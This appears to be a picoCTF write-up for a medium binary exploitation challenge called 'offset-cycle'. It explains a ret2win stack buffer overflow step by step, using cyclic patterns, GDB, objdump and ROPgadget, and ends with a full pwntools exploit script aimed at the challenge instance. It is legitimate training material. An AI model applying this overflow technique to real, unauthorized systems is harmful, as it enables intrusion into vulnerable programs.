picoCTF Solutions
picoCTF 2026Binary ExploitationMedium

offset-cycle

Published: March 20, 2026

Description

It's a race against time. Solve the binary exploit ASAP.

Setup

Launch the challenge instance and connect via netcat.

Download and analyse the binary.

Solution

  1. Step 1Reconnaissance
    Check the binary's protections and connect to understand the interface.
    checksec vuln
    nc <HOST> <PORT_FROM_INSTANCE>
    objdump -d vuln | grep -A10 win
  2. Step 2Find the buffer overflow offset
    Generate a cyclic pattern, crash the binary, and read back the pattern value at RSP/EIP to determine the exact offset to the return address.
    python3 -c "from pwn import *; print(cyclic(200))" > pattern.txt
    # Run locally: ./vuln < pattern.txt
    # or use GDB:
    gdb -q ./vuln -ex 'run < pattern.txt' -ex 'x/s $rsp'
    python3 -c "from pwn import *; print(cyclic_find(b'<value at rsp>'))"
  3. Step 3Locate the win function address
    Find the address of the win/flag function using objdump or pwntools ELF.
    objdump -d vuln | grep '<win>'
    python3 -c "from pwn import *; e=ELF('./vuln'); print(hex(e.sym['win']))"
  4. Step 4Build and send the payload
    Construct the payload: padding to offset, then win address. If the binary uses SSE (movaps), prepend a RET gadget to fix 16-byte stack alignment before the win function.
    # Find a RET gadget for alignment if needed:
    ROPgadget --binary vuln | grep ': ret$'
  5. Step 5Exploit script
    Full pwntools exploit. The RET gadget is only needed if you see a crash inside win() at a movaps instruction.
    python3 - <<'EOF' from pwn import * HOST, PORT = "<HOST>", <PORT_FROM_INSTANCE> e = ELF("./vuln") OFFSET = <offset> # found with cyclic WIN = e.sym["win"] # address of win/flag function RET_GADGET = <ret_addr> # optional: one-byte RET for 16-byte alignment payload = b"A" * OFFSET payload += p64(RET_GADGET) # remove this line if alignment isn't needed payload += p64(WIN) r = remote(HOST, PORT) r.sendlineafter(b":", payload) r.interactive() EOF

Flag

picoCTF{0ff53t_cycl3_...}

ret2win buffer overflow. Find the offset with a cyclic pattern, locate the win function with objdump/pwntools, and optionally prepend a RET gadget to fix stack alignment if movaps causes a crash.